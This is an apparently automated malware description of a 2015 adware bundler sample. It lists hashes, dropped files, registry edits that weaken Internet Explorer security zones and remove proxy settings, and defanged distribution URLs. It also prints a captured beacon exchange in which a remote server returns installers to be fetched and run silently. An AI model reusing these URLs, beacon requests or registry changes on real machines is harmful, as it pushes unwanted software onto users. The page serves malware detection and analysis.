Trojan.NSIS.StartPage_2c328ed34b

by malwarelabrobot on November 25th, 2015 in Malware Descriptions.

not-a-virus:AdWare.Win32.OutBrowse.bzb (Kaspersky), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Adware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 2c328ed34b295e5905a9684374cf95dd
SHA1: 924a68fcdfea14a664a20eb7a5aeddd4853d0e87
SHA256: f2999d031e3dca3fe8b3f2ccc2d8e296dd840555ed9bc91c69b77d44694fb7a8
SSDeep: 98304:EwIjOp0hKqLhn6O8hp w1djHxhKnL4qUUql3Oxl1VBImEQ/2c39Ol6MYKA/BKede:EwU0HDjKEhml1VBIQ Qwl6MYKA/Bzde
Size: 6337148 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC50, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, Armadillov171, UPolyXv05_v6
Company: no certificate found
Created at: 2007-04-19 03:08:20
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

setup.exe:880
%original file name%.exe:188

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process setup.exe:880 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\Offer2.zip (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\inner.png (146 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\blowfish.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\DSS_Unq_IMapplication_mon_remote_dcmd[1].htm (620 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\OfferScreen_12.html (1681 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\Offer1.zip (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\FirstResult.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\SecondResult.txt (620 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\nsCBHTML5.dll (1660 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\nsisunz.dll (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\serlib.dll (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\img12_1.jpg (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\FCL_htiw_qinu[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\OfferScreen_422.html (1969 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\header.bmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\manlib.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\GetVersion.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\nsDialogs.dll (9 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014040920140410 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014040920140410\index.dat (0 bytes)

The process %original file name%.exe:188 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\dotn1ba3.rra (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\DigiAqua_7598[1].exe (66929 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\{DDEF27CB-1234-106A-A265-901201505041}\DIFx1bd2.rra (87 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\{DDEF27CB-1234-106A-A265-901201505041}\isrt1c10.rra (7316 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\{DDEF27CB-1234-106A-A265-901201505041}\difx1c5f.rra (10582 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\Disk1\setup.ini (498 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\setup.ini (498 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Delta Tail Betta Wallpaper\UninstallDeltaTailBetta.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\{DDEF27CB-1234-106A-A265-901201505041}\setu1b74.rra (7348 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\setu294f.rra (4984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\{DDEF27CB-1234-106A-A265-901201505041}\Stri1bd2.rra (791 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\Disk1\layout.bin (437 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\{DDEF27CB-1234-106A-A265-901201505041}\defa1c20.rra (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\{DDEF27CB-1234-106A-A265-901201505041}\Font1bc2.rra (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\Disk1\_Setup.dll (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\Disk1\data1.hdr (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\_Setup.dll (2784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\{DDEF27CB-1234-106A-A265-901201505041}\_IsR1c3f.rra (4314 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\core1ba3.rra (2334 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\Disk1\data1.cab (27704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\Disk1\ISSetup.dll (18424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\Disk1\setup.exe (12536 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\DigiAqua_7598[1].exe (0 bytes)

Registry activity

The process setup.exe:880 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015112420151125]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012015112420151125\"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015112420151125]
"CachePrefix" = ":2015112420151125:"
"CacheRepair" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015112420151125]
"CacheLimit" = "8192"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CF FC DF B1 80 F8 81 0A C7 8C 9C B4 FB 04 5E A6"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015112420151125]
"CacheOptions" = "11"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014040920140410]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:188 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Fonts" = "%WinDir%\Fonts"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "62 A9 C4 7D 44 44 46 BC 91 CD C6 A1 1F 96 8F 27"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
5264f7d6d89d1dc04955cfb391798446 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsy2.tmp\GetVersion.dll
b140459077c7c39be4bef249c2f84535 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsy2.tmp\Math.dll
c17103ae9072a06da581dec998343fc1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsy2.tmp\System.dll
7579ade7ae1747a31960a228ce02e666 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsy2.tmp\UserInfo.dll
5afd4a9b7e69e7c6e312b2ce4040394a c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsy2.tmp\blowfish.dll
94ba775c8a1f4d6c9bb1966eddce22b5 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsy2.tmp\manlib.dll
fe3f848e2a306d586ab8f5433738d8db c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsy2.tmp\nsCBHTML5.dll
c10e04dd4ad4277d5adc951bb331c777 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsy2.tmp\nsDialogs.dll
5f13dbc378792f23e598079fc1e4422b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsy2.tmp\nsisunz.dll
2b7007ed0262ca02ef69d8990815cbeb c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsy2.tmp\registry.dll
febff2c363c7f7664687eefe8253087e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsy2.tmp\serlib.dll
d061c9eea5e041658028c32aa739984f c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\setup.exe
69348c7c4260e37c1c72edf236995be1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\dotnetinstaller.exe
898515a4ae2fb9d74ae2a905cf82b074 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\{DDEF27CB-1234-106A-A265-901201505041}\_IsRes.dll
1bd976dd77b31fe0f25708ad5c1351ae c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\{DDEF27CB-1234-106A-A265-901201505041}\difxapi.dll
77a3125a2059f39a9bef961953a8db8d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\{DDEF27CB-1234-106A-A265-901201505041}\isrt.dll
6c48e05107eb494620ab0dc96d3c5b80 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\Disk1\ISSetup.dll
6fd5033f836dbc81fda60620d9c0ba52 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\Disk1\_Setup.dll
6f58a1d8e7b031c6f2a60ba04d1a0b7d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\Disk1\setup.exe
6fd5033f836dbc81fda60620d9c0ba52 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\_Setup.dll
d061c9eea5e041658028c32aa739984f c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\DigiAqua_7598[1].exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: Macrovision Corporation
Product Name: InstallShield
Product Version: 14.0
Legal Copyright: Copyright (C) 2007 Macrovision Corporation
Legal Trademarks:
Original Filename: Setup.exe
Internal Name: Setup
File Version: 14.0.162
File Description: Setup.exe
Comments:
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 293442 294912 4.56241 246bc04c9934d94ae3e5085c0fbab939
.rdata 299008 39536 40960 3.16332 16f2af57c4910be773837ffdb7fbde59
.data 339968 29740 24576 2.27004 ed1e754e7b6303e212e660e942089261
.rsrc 372736 7000 8192 4.25048 1fc89bcfdfcdf5c08b6e2805b4bd1040

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 70
9f3bbfb0a47d9c012654272549fda218
2ac6615b7144be7a6a2d94ab58738ea6
57181c9d8165e1507093cbd199c4d015
e70c170501c13c28f9750ab0cf808401
d85279e52df89787e7854bf52d90c607
5ab5635d2adc78ac8c0d636f86c7da0f
7d22e3ee9479856a8a820ba57df28071
08c8509565ddbf2142d64d60bf2a652e
2a7a046094c7f23fd6acca8dc84f0c18
3bed5ffc49e8235c62f7a378f6b0d0f0
444a9d48bff192a5f833c92c658c4553
5c0ea759d8b417daeb10ca9e4d728140
c16bf52916e583f1c1c7a6c72ba5e61a
9e0bf77e0d7df1d1fbf7f662b191d22c
34a89f9eee56c73c66a5d3e1e155a11b
0a654e158291e5348f4ac4e279667444
476c1d505f16968b45924180f308be8d
aaee75b85e93d14c4a0cd820703b0632
76e105dec3ae6fd038f0c364d8ca2012
194927b379cd0c708c781e4aea915045
651672182f69923a157c03bd188ef6bb
29ddbe4fe594cb083bf81c3f35454d13
2d6d79284cb3ed4138065c98564bf48c
7fef913c1fb871385192068db6dc75e8
22da7f202dc2a0a7be52ef468961f2be

URLs

URL IP
hxxp://cds.u6k4e8n6.hwcdn.net/DigiAqua_7598.exe
hxxp://23.22.255.164/download.php?ln6GeA==
hxxp://fcesneim.us/FCL_htiw_qinu.php
hxxp://stsunsetwest.com/DSS_Unq_IMapplication_mon_remote_dcmd.php
hxxp://cds.u6k4e8n6.hwcdn.net/os/rm/OfferScreen_12_HD.zip
hxxp://cds.u6k4e8n6.hwcdn.net/os/rm/OfferScreen_422.zip
hxxp://secured.cdnpmmm.us/DigiAqua_7598.exe 69.16.175.42
hxxp://www.stsunsetwest.com/DSS_Unq_IMapplication_mon_remote_dcmd.php 50.97.62.154
hxxp://www.fcesneim.us/FCL_htiw_qinu.php 50.19.102.217
hxxp://secured.cdnpmmm.us/os/rm/OfferScreen_12_HD.zip 69.16.175.42
hxxp://secured.cdnpmmm.us/os/rm/OfferScreen_422.zip 69.16.175.42
hxxp://www.comar13west.com/download.php?ln6GeA==


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Installshield One Click Install User-Agent Toys File
ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET MALWARE W32/InstallMonetizer.Adware Beacon 2

Traffic

POST /DSS_Unq_IMapplication_mon_remote_dcmd.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.stsunsetwest.com
Content-Length: 288
Connection: Keep-Alive
Cache-Control: no-cache

from=nsis&type=Reg&mode=checker&utid=37.57.16.189_2015-11-23_23:57:47&pubid=11660&CbId=7598&BundleVersionID=IM_240914@01&subid=&mid=qGKynuZ0mun81YJHk71SsLj1y8vIIG48&DB=IE&arc=32&skexist=NO&avsexist=NO&advDetails=12~YES~0/419~NO~4/422~YES~0/430~NO~15/460~YES~0/575~NO~4/576~NO~4/689~YES~0/
HTTP/1.1 200 OK
Date: Tue, 24 Nov 2015 04:57:49 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 620
Connection: close
Content-Type: text/html; charset=UTF-8
422~hXXp://secured.cdnpmmm.us/os/rm/OfferScreen_422.zip~hXXp://VVV.dja
pp.info/?file=bundle~hXXp://VVV.djapp.info/?file=bundle~null~0~1~0.01#
12~hXXp://secured.cdnpmmm.us/os/rm/OfferScreen_12_HD.zip~hXXp://cloudf
ront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.s
ystweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0..422#RE3|mysta
rtsearchSoftware\mystartsearchhp#RCMD|-pub_id=314 -adv_id=76#SLP|30^6#
PKG|NO#INT|Mntz_Installer.exe..12#RE2|Systweak\RegClean Pro\Version 6.
1#RCMD|/verysilent#SLP|10^3#FNV|WriteINI^hXXps://d24u51ac8ybaqu.cloudf
ront.net/inst/setup_38a77a.exe#PKG|NO#INT|rcpsetup_17970.exe..



GET /os/rm/OfferScreen_422.zip HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: secured.cdnpmmm.us
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Tue, 24 Nov 2015 04:57:49 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1426709167"
Last-Modified: Wed, 18 Mar 2015 20:06:07 GMT
Cache-Control: max-age=53850
Content-Length: 7218
Content-Type: application/octet-stream
X-HW: 1448341070.dop007.fr7.t,1448341069.cds026.fr7.c
PK........Q~.B...._...........inner.png.V.P.i..da.QP...h.......$.!$ G.
`........4$...UP.Ee8,..%.(.............u5..."r8r8......).j_U.....wW...
....V. ...~.4.f5.<yz..w...].b..f.X.@&.H ...s!.O...........#.H.0.-c3
.$.,Bs.u..Q<b^.=...^,$..P.PLF.k....|2*...2..P..7E..R..y).<"....p
W.4."H....8... .>..4..k....".%.~s.........h.#.K...3.t........b1 ..u
q..$....._...&..HL...[....#...0..\..;.aI4.$...,...9j4...b.G.(.Z/0. )O"
...a10..p.D...Z.A..`.N,.~I.&e..'.........-.1!..........I.D.OS......:..
|....D.).'....E.X.G#.4_.|!.D.P..>T.......5..\])x...........aAgW"..s
